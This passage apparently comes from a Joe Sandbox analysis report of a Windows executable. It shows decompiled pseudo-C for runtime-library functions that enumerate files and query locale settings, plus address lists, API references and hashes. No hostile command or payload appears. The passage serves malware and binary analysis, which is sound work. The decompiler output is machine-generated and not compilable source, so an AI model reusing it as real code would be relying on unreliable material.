                                                                                      				signed int _t182;
                                                                                      				void* _t183;
                                                                                      				void* _t184;
                                                                                      
                                                                                      				_push(__ecx);
                                                                                      				_t142 = _a4;
                                                                                      				_t2 = _t142 + 1; // 0x1
                                                                                      				_t164 = _t2;
                                                                                      				do {
                                                                                      					_t72 =  *_t142;
                                                                                      					_t142 = _t142 + 1;
                                                                                      				} while (_t72 != 0);
                                                                                      				_t167 = _a12;
                                                                                      				_t144 = _t142 - _t164 + 1;
                                                                                      				_v8 = _t144;
                                                                                      				if(_t144 <=  !_t167) {
                                                                                      					_t5 = _t167 + 1; // 0x1
                                                                                      					_t135 = _t5 + _t144;
                                                                                      					_t174 = E00420CEC(_t135, 1);
                                                                                      					_t146 = _t173;
                                                                                      					__eflags = _t167;
                                                                                      					if(_t167 == 0) {
                                                                                      						L7:
                                                                                      						_push(_v8);
                                                                                      						_t135 = _t135 - _t167;
                                                                                      						_t77 = E0042EB08(_t146, _t174 + _t167, _t135, _a4);
                                                                                      						_t182 = _t181 + 0x10;
                                                                                      						__eflags = _t77;
                                                                                      						if(_t77 != 0) {
                                                                                      							goto L12;
                                                                                      						} else {
                                                                                      							_t139 = _a16;
                                                                                      							_t127 = E0042872B(_t139);
                                                                                      							_v8 = _t127;
                                                                                      							__eflags = _t127;
                                                                                      							if(_t127 == 0) {
                                                                                      								 *( *(_t139 + 4)) = _t174;
                                                                                      								_t177 = 0;
                                                                                      								_t14 = _t139 + 4;
                                                                                      								 *_t14 =  *(_t139 + 4) + 4;
                                                                                      								__eflags =  *_t14;
                                                                                      							} else {
                                                                                      								E00421955(_t174);
                                                                                      								_t177 = _v8;
                                                                                      							}
                                                                                      							E00421955(0);
                                                                                      							_t130 = _t177;
                                                                                      							goto L4;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_push(_t167);
                                                                                      						_t132 = E0042EB08(_t146, _t174, _t135, _a8);
                                                                                      						_t182 = _t181 + 0x10;
                                                                                      						__eflags = _t132;
                                                                                      						if(_t132 != 0) {
                                                                                      							L12:
                                                                                      							_push(0);
                                                                                      							_push(0);
                                                                                      							_push(0);
                                                                                      							_push(0);
                                                                                      							_push(0);
                                                                                      							E0041807C();
                                                                                      							asm("int3");
                                                                                      							_t180 = _t182;
                                                                                      							_t183 = _t182 - 0x298;
                                                                                      							_t79 =  *0x443048; // 0x9900ec21
                                                                                      							_v48 = _t79 ^ _t180;
                                                                                      							_t147 = _v32;
                                                                                      							_t165 = _v28;
                                                                                      							_push(_t135);
                                                                                      							_push(0);
                                                                                      							_t169 = _v36;
                                                                                      							_v648 = _t165;
                                                                                      							__eflags = _t147 - _t169;
                                                                                      							if(_t147 != _t169) {
                                                                                      								while(1) {
                                                                                      									_t125 =  *_t147;
                                                                                      									__eflags = _t125 - 0x2f;
                                                                                      									if(_t125 == 0x2f) {
                                                                                      										break;
                                                                                      									}
                                                                                      									__eflags = _t125 - 0x5c;
                                                                                      									if(_t125 != 0x5c) {
                                                                                      										__eflags = _t125 - 0x3a;
                                                                                      										if(_t125 != 0x3a) {
                                                                                      											_t147 = E0042F9C0(_t169, _t147);
                                                                                      											__eflags = _t147 - _t169;
                                                                                      											if(_t147 != _t169) {
                                                                                      												continue;
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      									break;
                                                                                      								}
                                                                                      								_t165 = _v612;
                                                                                      							}
                                                                                      							_t81 =  *_t147;
                                                                                      							_v605 = _t81;
                                                                                      							__eflags = _t81 - 0x3a;
                                                                                      							if(_t81 != 0x3a) {
                                                                                      								L23:
                                                                                      								__eflags = _t81 - 0x2f;
                                                                                      								if(__eflags == 0) {
                                                                                      									L26:
                                                                                      									_t82 = 1;
                                                                                      								} else {
                                                                                      									__eflags = _t81 - 0x5c;
                                                                                      									if(__eflags == 0) {
                                                                                      										goto L26;
                                                                                      									} else {
                                                                                      										__eflags = _t81 - 0x3a;
                                                                                      										_t82 = 0;
                                                                                      										if(__eflags == 0) {
                                                                                      											goto L26;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								_v660 = 0;
                                                                                      								_v656 = 0;
                                                                                      								_push(_t174);
                                                                                      								asm("sbb eax, eax");
                                                                                      								_v652 = 0;
                                                                                      								_v648 = 0;
                                                                                      								_v664 =  ~(_t82 & 0x000000ff) & _t147 - _t169 + 0x00000001;
                                                                                      								_v644 = 0;
                                                                                      								_v640 = 0;
                                                                                      								_t88 = E0041D39D(_t147 - _t169 + 1, _t169,  &_v660, E00427F9A(_t165, __eflags));
                                                                                      								_t184 = _t183 + 0xc;
                                                                                      								asm("sbb eax, eax");
                                                                                      								_t175 = FindFirstFileExW( !( ~_t88) & _v652, 0,  &_v604, 0, 0, 0);
                                                                                      								__eflags = _t175 - 0xffffffff;
                                                                                      								if(_t175 != 0xffffffff) {
                                                                                      									_t151 = _v612;
                                                                                      									_t94 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
                                                                                      									__eflags = _t94;
                                                                                      									_v668 = _t94 >> 2;
                                                                                      									do {
                                                                                      										_v636 = 0;
                                                                                      										_v632 = 0;
                                                                                      										_v628 = 0;
                                                                                      										_v624 = 0;
                                                                                      										_v620 = 0;
                                                                                      										_v616 = 0;
                                                                                      										_t100 = E0042814D( &(_v604.cFileName),  &_v636,  &_v605, E00427F9A(_t165, __eflags));
                                                                                      										_t184 = _t184 + 0x10;
                                                                                      										asm("sbb eax, eax");
                                                                                      										_t103 =  !( ~_t100) & _v628;
                                                                                      										__eflags =  *_t103 - 0x2e;
                                                                                      										if( *_t103 != 0x2e) {
                                                                                      											L36:
                                                                                      											_push(_v612);
                                                                                      											_t104 = E00428390(_t151, _t103, _t169, _v664);
                                                                                      											_t184 = _t184 + 0x10;
                                                                                      											_v672 = _t104;
                                                                                      											__eflags = _t104;
                                                                                      											if(_t104 != 0) {
                                                                                      												__eflags = _v616;
                                                                                      												if(_v616 != 0) {
                                                                                      													E00421955(_v628);
                                                                                      												}
                                                                                      												FindClose(_t175);
                                                                                      												__eflags = _v640;
                                                                                      												if(_v640 != 0) {
                                                                                      													E00421955(_v652);
                                                                                      												}
                                                                                      												_t106 = _v672;
                                                                                      											} else {
                                                                                      												goto L37;
                                                                                      											}
                                                                                      										} else {
                                                                                      											_t151 =  *((intOrPtr*)(_t103 + 1));
                                                                                      											__eflags = _t151;
                                                                                      											if(_t151 == 0) {
                                                                                      												goto L37;
                                                                                      											} else {
                                                                                      												__eflags = _t151 - 0x2e;
                                                                                      												if(_t151 != 0x2e) {
                                                                                      													goto L36;
                                                                                      												} else {
                                                                                      													__eflags =  *(_t103 + 2);
                                                                                      													if( *(_t103 + 2) == 0) {
                                                                                      														goto L37;
                                                                                      													} else {
                                                                                      														goto L36;
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      										goto L50;
                                                                                      										L37:
                                                                                      										__eflags = _v616;
                                                                                      										if(_v616 != 0) {
                                                                                      											E00421955(_v628);
                                                                                      											_pop(_t151);
                                                                                      										}
                                                                                      										__eflags = FindNextFileW(_t175,  &_v604);
                                                                                      									} while (__eflags != 0);
                                                                                      									_t112 = _v612;
                                                                                      									_t156 = _v668;
                                                                                      									_t165 =  *_t112;
                                                                                      									_t115 =  *((intOrPtr*)(_t112 + 4)) -  *_t112 >> 2;
                                                                                      									__eflags = _t156 - _t115;
                                                                                      									if(_t156 != _t115) {
                                                                                      										__eflags = _t115 - _t156;
                                                                                      										E0042F490(_t165, _t165 + _t156 * 4, _t115 - _t156, 4, E00428135);
                                                                                      									}
                                                                                      									FindClose(_t175);
                                                                                      									__eflags = _v640;
                                                                                      									if(_v640 != 0) {
                                                                                      										E00421955(_v652);
                                                                                      									}
                                                                                      									_t106 = 0;
                                                                                      								} else {
                                                                                      									_push(_v612);
                                                                                      									_t176 = E00428390( &_v604, _t169, 0, 0);
                                                                                      									__eflags = _v640;
                                                                                      									if(_v640 != 0) {
                                                                                      										E00421955(_v652);
                                                                                      									}
                                                                                      									_t106 = _t176;
                                                                                      								}
                                                                                      								L50:
                                                                                      								_pop(_t174);
                                                                                      							} else {
                                                                                      								__eflags = _t147 - _t169 + 1;
                                                                                      								if(_t147 == _t169 + 1) {
                                                                                      									_t81 = _v605;
                                                                                      									goto L23;
                                                                                      								} else {
                                                                                      									_push(_t165);
                                                                                      									_t106 = E00428390(_t147, _t169, 0, 0);
                                                                                      								}
                                                                                      							}
                                                                                      							_pop(_t170);
                                                                                      							__eflags = _v12 ^ _t180;
                                                                                      							_pop(_t137);
                                                                                      							return E0041361E(_t106, _t137, _v12 ^ _t180, _t165, _t170, _t174);
                                                                                      						} else {
                                                                                      							goto L7;
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t130 = 0xc;
                                                                                      					L4:
                                                                                      					return _t130;
                                                                                      				}
                                                                                      			}





































































                                                                                      0x00428395
                                                                                      0x00428396
                                                                                      0x00428399
                                                                                      0x00428399
                                                                                      0x0042839c
                                                                                      0x0042839c
                                                                                      0x0042839e
                                                                                      0x0042839f
                                                                                      0x004283a4
                                                                                      0x004283ab
                                                                                      0x004283ae
                                                                                      0x004283b3
                                                                                      0x004283bd
                                                                                      0x004283c0
                                                                                      0x004283ca
                                                                                      0x004283cd
                                                                                      0x004283ce
                                                                                      0x004283d0
                                                                                      0x004283e4
                                                                                      0x004283e4
                                                                                      0x004283e7
                                                                                      0x004283f1
                                                                                      0x004283f6
                                                                                      0x004283f9
                                                                                      0x004283fb
                                                                                      0x00000000
                                                                                      0x004283fd
                                                                                      0x004283fd
                                                                                      0x00428402
                                                                                      0x00428409
                                                                                      0x0042840c
                                                                                      0x0042840e
                                                                                      0x0042841f
                                                                                      0x00428421
                                                                                      0x00428423
                                                                                      0x00428423
                                                                                      0x00428423
                                                                                      0x00428410
                                                                                      0x00428411
                                                                                      0x00428416
                                                                                      0x00428419
                                                                                      0x00428428
                                                                                      0x0042842e
                                                                                      0x00000000
                                                                                      0x00428431
                                                                                      0x004283d2
                                                                                      0x004283d2
                                                                                      0x004283d8
                                                                                      0x004283dd
                                                                                      0x004283e0
                                                                                      0x004283e2
                                                                                      0x00428434
                                                                                      0x00428436
                                                                                      0x00428437
                                                                                      0x00428438
                                                                                      0x00428439
                                                                                      0x0042843a
                                                                                      0x0042843b
                                                                                      0x00428440
                                                                                      0x00428444
                                                                                      0x00428446
                                                                                      0x0042844c
                                                                                      0x00428453
                                                                                      0x00428456
                                                                                      0x00428459
                                                                                      0x0042845c
                                                                                      0x0042845d
                                                                                      0x0042845e
                                                                                      0x00428461
                                                                                      0x00428467
                                                                                      0x00428469
                                                                                      0x0042846b
                                                                                      0x0042846b
                                                                                      0x0042846d
                                                                                      0x0042846f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00428471
                                                                                      0x00428473
                                                                                      0x00428475
                                                                                      0x00428477
                                                                                      0x00428482
                                                                                      0x00428484
                                                                                      0x00428486
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00428486
                                                                                      0x00428477
                                                                                      0x00000000
                                                                                      0x00428473
                                                                                      0x00428488
                                                                                      0x00428488
                                                                                      0x0042848e
                                                                                      0x00428490
                                                                                      0x00428496
                                                                                      0x00428498
                                                                                      0x004284ba
                                                                                      0x004284bc
                                                                                      0x004284be
                                                                                      0x004284ca
                                                                                      0x004284ca
                                                                                      0x004284c0
                                                                                      0x004284c0
                                                                                      0x004284c2
                                                                                      0x00000000
                                                                                      0x004284c4
                                                                                      0x004284c4
                                                                                      0x004284c6
                                                                                      0x004284c8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004284c8
                                                                                      0x004284c2
                                                                                      0x004284d2
                                                                                      0x004284da
                                                                                      0x004284e0
                                                                                      0x004284e1
                                                                                      0x004284e3
                                                                                      0x004284eb
                                                                                      0x004284f1
                                                                                      0x004284f7
                                                                                      0x004284fd
                                                                                      0x00428511
                                                                                      0x00428516
                                                                                      0x00428521
                                                                                      0x00428537
                                                                                      0x00428539
                                                                                      0x0042853c
                                                                                      0x0042856c
                                                                                      0x00428575
                                                                                      0x00428575
                                                                                      0x0042857a
                                                                                      0x00428580
                                                                                      0x00428580
                                                                                      0x00428586
                                                                                      0x0042858c
                                                                                      0x00428592
                                                                                      0x00428598
                                                                                      0x0042859e
                                                                                      0x004285bf
                                                                                      0x004285c4
                                                                                      0x004285c9
                                                                                      0x004285cd
                                                                                      0x004285d3
                                                                                      0x004285d6
                                                                                      0x004285e9
                                                                                      0x004285e9
                                                                                      0x004285f7
                                                                                      0x004285fc
                                                                                      0x004285ff
                                                                                      0x00428605
                                                                                      0x00428607
                                                                                      0x00428682
                                                                                      0x00428688
                                                                                      0x00428690
                                                                                      0x00428695
                                                                                      0x00428697
                                                                                      0x0042869d
                                                                                      0x004286a3
                                                                                      0x004286ab
                                                                                      0x004286b0
                                                                                      0x004286b1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004285d8
                                                                                      0x004285d8
                                                                                      0x004285db
                                                                                      0x004285dd
                                                                                      0x00000000
                                                                                      0x004285df
                                                                                      0x004285df
                                                                                      0x004285e2
                                                                                      0x00000000
                                                                                      0x004285e4
                                                                                      0x004285e4
                                                                                      0x004285e7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004285e7
                                                                                      0x004285e2
                                                                                      0x004285dd
                                                                                      0x00000000
                                                                                      0x00428609
                                                                                      0x00428609
                                                                                      0x0042860f
                                                                                      0x00428617
                                                                                      0x0042861c
                                                                                      0x0042861c
                                                                                      0x0042862b
                                                                                      0x0042862b
                                                                                      0x00428633
                                                                                      0x00428639
                                                                                      0x0042863f
                                                                                      0x00428646
                                                                                      0x00428649
                                                                                      0x0042864b
                                                                                      0x00428652
                                                                                      0x0042865b
                                                                                      0x00428660
                                                                                      0x00428664
                                                                                      0x0042866a
                                                                                      0x00428670
                                                                                      0x00428678
                                                                                      0x0042867d
                                                                                      0x0042867e
                                                                                      0x0042853e
                                                                                      0x0042853e
                                                                                      0x0042854f
                                                                                      0x00428551
                                                                                      0x00428557
                                                                                      0x0042855f
                                                                                      0x00428564
                                                                                      0x00428565
                                                                                      0x00428565
                                                                                      0x004286b7
                                                                                      0x004286b7
                                                                                      0x0042849a
                                                                                      0x0042849d
                                                                                      0x0042849f
                                                                                      0x004284b4
                                                                                      0x00000000
                                                                                      0x004284a1
                                                                                      0x004284a1
                                                                                      0x004284a7
                                                                                      0x004284ac
                                                                                      0x0042849f
                                                                                      0x004286bb
                                                                                      0x004286bc
                                                                                      0x004286be
                                                                                      0x004286c5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004283e2
                                                                                      0x004283b5
                                                                                      0x004283b7
                                                                                      0x004283b8
                                                                                      0x004283ba
                                                                                      0x004283ba

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a2851c78cb641dc8751c87f22a5c31f2ec5344f90778a4143148a6754006df4a
                                                                                      • Instruction ID: d2a889c4e4ab22da45b13c231c901af6bbb2b415ccc49b1eaa155dbaf1fc4cc7
                                                                                      • Opcode Fuzzy Hash: a2851c78cb641dc8751c87f22a5c31f2ec5344f90778a4143148a6754006df4a
                                                                                      • Instruction Fuzzy Hash: 0B41A6B5905229AFDB10DF69DC89AAEBBB8AF45304F5442DEE40CD3201DA359E858F14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 64%
                                                                                      			E0042B74F(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                      				signed int _v8;
                                                                                      				short _v248;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t15;
                                                                                      				signed int _t21;
                                                                                      				void* _t23;
                                                                                      				void* _t30;
                                                                                      				void* _t32;
                                                                                      				signed int _t41;
                                                                                      				signed int* _t47;
                                                                                      				int _t49;
                                                                                      				signed int _t50;
                                                                                      
                                                                                      				_t46 = __edx;
                                                                                      				_t15 =  *0x443048; // 0x9900ec21
                                                                                      				_v8 = _t15 ^ _t50;
                                                                                      				_t48 = _a4;
                                                                                      				_t32 = E00420590(__ecx, __edx, _a4);
                                                                                      				_t47 =  *(E00420590(__ecx, __edx, _a4) + 0x34c);
                                                                                      				_t49 = E0042B824(_t48);
                                                                                      				asm("sbb ecx, ecx");
                                                                                      				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                                                                      				if(_t21 != 0) {
                                                                                      					_t23 = E00427E64(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
                                                                                      					_t41 =  *(_t32 + 0x60);
                                                                                      					if(_t23 != 0) {
                                                                                      						if(_t41 == 0 &&  *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
                                                                                      							_t30 = E00427E64(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
                                                                                      							if(_t30 == 0) {
                                                                                      								_push(_t47);
                                                                                      								_push(_t30);
                                                                                      								goto L9;
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						if(_t41 != 0) {
                                                                                      							L10:
                                                                                      							 *_t47 =  *_t47 | 0x00000004;
                                                                                      							_t47[1] = _t49;
                                                                                      							_t47[2] = _t49;
                                                                                      						} else {
                                                                                      							_push(_t47);
                                                                                      							_push(1);
                                                                                      							L9:
                                                                                      							_push(_t49);
                                                                                      							if(E0042B97E() != 0) {
                                                                                      								goto L10;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_t27 =  !( *_t47 >> 2) & 0x00000001;
                                                                                      				} else {
                                                                                      					 *_t47 =  *_t47 & _t21;
                                                                                      					_t27 = _t21 + 1;
                                                                                      				}
                                                                                      				return E0041361E(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
                                                                                      			}


















                                                                                      0x0042b74f
                                                                                      0x0042b75a
                                                                                      0x0042b761
                                                                                      0x0042b766
                                                                                      0x0042b76f
                                                                                      0x0042b777
                                                                                      0x0042b786
                                                                                      0x0042b792
                                                                                      0x0042b7a3
                                                                                      0x0042b7ab
                                                                                      0x0042b7bc
                                                                                      0x0042b7c3
                                                                                      0x0042b7c8
                                                                                      0x0042b7d5
                                                                                      0x0042b7e6
                                                                                      0x0042b7ef
                                                                                      0x0042b7f1
                                                                                      0x0042b7f2
                                                                                      0x00000000
                                                                                      0x0042b7f2
                                                                                      0x0042b7ef
                                                                                      0x0042b7ca
                                                                                      0x0042b7cc
                                                                                      0x0042b800
                                                                                      0x0042b800
                                                                                      0x0042b803
                                                                                      0x0042b806
                                                                                      0x0042b7ce
                                                                                      0x0042b7ce
                                                                                      0x0042b7cf
                                                                                      0x0042b7f3
                                                                                      0x0042b7f3
                                                                                      0x0042b7fe
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b7fe
                                                                                      0x0042b7cc
                                                                                      0x0042b810
                                                                                      0x0042b7ad
                                                                                      0x0042b7ad
                                                                                      0x0042b7af
                                                                                      0x0042b7af
                                                                                      0x0042b821

                                                                                      APIs
                                                                                        • Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
                                                                                        • Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042B7A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 3736152602-0
                                                                                      • Opcode ID: 7463fdf6539469b88c41cb582bb761eb88bd5e67252c2e06de94d6500565ebf3
                                                                                      • Instruction ID: 0ac6a602e87faf57b924cd42c56e0df9e0fe7f879a3993de3b265791f1f33201
                                                                                      • Opcode Fuzzy Hash: 7463fdf6539469b88c41cb582bb761eb88bd5e67252c2e06de94d6500565ebf3
                                                                                      • Instruction Fuzzy Hash: 2E21A171711226ABDB28AF15EC42A7B73ACEF54714F54407FE905C6241EB38ED40CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E0042B3D6(void* __ecx, void* __edx, signed int* _a4) {
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				intOrPtr _t26;
                                                                                      				intOrPtr _t29;
                                                                                      				signed int _t32;
                                                                                      				signed char _t33;
                                                                                      				signed char _t34;
                                                                                      				intOrPtr* _t38;
                                                                                      				intOrPtr* _t41;
                                                                                      				signed int _t47;
                                                                                      				void* _t50;
                                                                                      				void* _t51;
                                                                                      				signed int* _t52;
                                                                                      				void* _t53;
                                                                                      				void* _t54;
                                                                                      				signed int _t62;
                                                                                      
                                                                                      				_t54 = E00420590(__ecx, __edx, _t53);
                                                                                      				_t47 = 2;
                                                                                      				_t38 =  *((intOrPtr*)(_t54 + 0x50));
                                                                                      				_t50 = _t38 + 2;
                                                                                      				do {
                                                                                      					_t26 =  *_t38;
                                                                                      					_t38 = _t38 + _t47;
                                                                                      				} while (_t26 != 0);
                                                                                      				_t41 =  *((intOrPtr*)(_t54 + 0x54));
                                                                                      				 *(_t54 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
                                                                                      				_t51 = _t41 + 2;
                                                                                      				do {
                                                                                      					_t29 =  *_t41;
                                                                                      					_t41 = _t41 + _t47;
                                                                                      				} while (_t29 != 0);
                                                                                      				_t52 = _a4;
                                                                                      				 *(_t54 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
                                                                                      				_t52[1] = 0;
                                                                                      				if( *(_t54 + 0x60) == 0) {
                                                                                      					_t47 = E0042B4D0( *((intOrPtr*)(_t54 + 0x50)));
                                                                                      				}
                                                                                      				 *(_t54 + 0x5c) = _t47;
                                                                                      				_t32 = EnumSystemLocalesW(E0042B4FC, 1);
                                                                                      				_t62 =  *_t52 & 0x00000007;
                                                                                      				asm("bt ecx, 0x9");
                                                                                      				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                                                                                      				asm("bt ecx, 0x8");
                                                                                      				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                                                                                      				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                                                                                      					 *_t52 = 0;
                                                                                      					return _t34;
                                                                                      				}
                                                                                      				return _t34;
                                                                                      			}



















                                                                                      0x0042b3e3
                                                                                      0x0042b3e9
                                                                                      0x0042b3ea
                                                                                      0x0042b3ed
                                                                                      0x0042b3f0
                                                                                      0x0042b3f0
                                                                                      0x0042b3f3
                                                                                      0x0042b3f5
                                                                                      0x0042b403
                                                                                      0x0042b409
                                                                                      0x0042b40c
                                                                                      0x0042b40f
                                                                                      0x0042b40f
                                                                                      0x0042b412
                                                                                      0x0042b414
                                                                                      0x0042b41d
                                                                                      0x0042b428
                                                                                      0x0042b42b
                                                                                      0x0042b431
                                                                                      0x0042b43c
                                                                                      0x0042b43c
                                                                                      0x0042b445
                                                                                      0x0042b448
                                                                                      0x0042b450
                                                                                      0x0042b456
                                                                                      0x0042b45a
                                                                                      0x0042b45f
                                                                                      0x0042b463
                                                                                      0x0042b468
                                                                                      0x0042b46a
                                                                                      0x00000000
                                                                                      0x0042b46a
                                                                                      0x0042b470

                                                                                      APIs
                                                                                        • Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
                                                                                        • Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636
                                                                                      • EnumSystemLocalesW.KERNEL32(0042B4FC,00000001,00000000,?,-00000050,?,0042BB2D,00000000,?,?,?,00000055,?), ref: 0042B448
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2417226690-0
                                                                                      • Opcode ID: 4a42c23b6a449a19ce65b80664115526c9ad1ab6432036e31bfaa55824555ee3
                                                                                      • Instruction ID: 43a386682e75942e12222d4ef1c629f9c915ec6b6c4ff2abf4f6728031839f98
                                                                                      • Opcode Fuzzy Hash: 4a42c23b6a449a19ce65b80664115526c9ad1ab6432036e31bfaa55824555ee3
                                                                                      • Instruction Fuzzy Hash: 1E1129363007055FDB18AF39D8D157BB791FF80358B54442EE94687B42D375B942CB84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 87%
                                                                                      			E0042B97E(signed int _a4, intOrPtr _a8) {
                                                                                      				short _v8;
                                                                                      				void* __ecx;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				void* _t8;
                                                                                      				void* _t11;
                                                                                      				intOrPtr _t13;
                                                                                      				void* _t15;
                                                                                      				void* _t19;
                                                                                      				void* _t21;
                                                                                      				void* _t23;
                                                                                      				void* _t25;
                                                                                      				signed int _t26;
                                                                                      				intOrPtr* _t28;
                                                                                      
                                                                                      				_push(_t15);
                                                                                      				_push(_t25);
                                                                                      				_t8 = E00420590(_t15, _t21, _t25);
                                                                                      				_t26 = _a4;
                                                                                      				_t23 = _t8;
                                                                                      				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
                                                                                      					L7:
                                                                                      					_t11 = 0;
                                                                                      				} else {
                                                                                      					if(_t26 == _v8 || _a8 == 0) {
                                                                                      						L6:
                                                                                      						_t11 = 1;
                                                                                      					} else {
                                                                                      						_t28 =  *((intOrPtr*)(_t23 + 0x50));
                                                                                      						_t19 = _t28 + 2;
                                                                                      						do {
                                                                                      							_t13 =  *_t28;
                                                                                      							_t28 = _t28 + 2;
                                                                                      						} while (_t13 != 0);
                                                                                      						if(E0042B4D0( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
                                                                                      							goto L7;
                                                                                      						} else {
                                                                                      							goto L6;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t11;
                                                                                      			}

















                                                                                      0x0042b983
                                                                                      0x0042b984
                                                                                      0x0042b986
                                                                                      0x0042b98b
                                                                                      0x0042b98e
                                                                                      0x0042b9b2
                                                                                      0x0042b9e6
                                                                                      0x0042b9e6
                                                                                      0x0042b9b4
                                                                                      0x0042b9b7
                                                                                      0x0042b9e1
                                                                                      0x0042b9e3
                                                                                      0x0042b9bf
                                                                                      0x0042b9bf
                                                                                      0x0042b9c2
                                                                                      0x0042b9c5
                                                                                      0x0042b9c5
                                                                                      0x0042b9c8
                                                                                      0x0042b9cb
                                                                                      0x0042b9df
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b9df
                                                                                      0x0042b9b7
                                                                                      0x0042b9eb

                                                                                      APIs
                                                                                        • Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
                                                                                        • Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636
                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042B718,00000000,00000000,?), ref: 0042B9AA
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 3736152602-0
                                                                                      • Opcode ID: 2123abe2193c738403007aad464ed0bbaf13189636fe1c6511e3c635edd09ebc
                                                                                      • Instruction ID: 51157c1039b9e3f48a6d3721deaf29cd5ae80b4af2b6cf62f340dc0e901ddaaa
                                                                                      • Opcode Fuzzy Hash: 2123abe2193c738403007aad464ed0bbaf13189636fe1c6511e3c635edd09ebc
                                                                                      • Instruction Fuzzy Hash: 21F0F9727001357BDB285B219C467BB7764EF40758F54442BED02A3280EB38FE81C6D8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0042B471(void* __ecx, void* __edx, signed char* _a4) {
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				intOrPtr _t11;
                                                                                      				signed char* _t15;
                                                                                      				intOrPtr* _t19;
                                                                                      				intOrPtr _t24;
                                                                                      				void* _t25;
                                                                                      				void* _t26;
                                                                                      				void* _t27;
                                                                                      
                                                                                      				_t27 = E00420590(__ecx, __edx, _t26);
                                                                                      				_t24 = 2;
                                                                                      				_t19 =  *((intOrPtr*)(_t27 + 0x50));
                                                                                      				_t25 = _t19 + 2;
                                                                                      				do {
                                                                                      					_t11 =  *_t19;
                                                                                      					_t19 = _t19 + _t24;
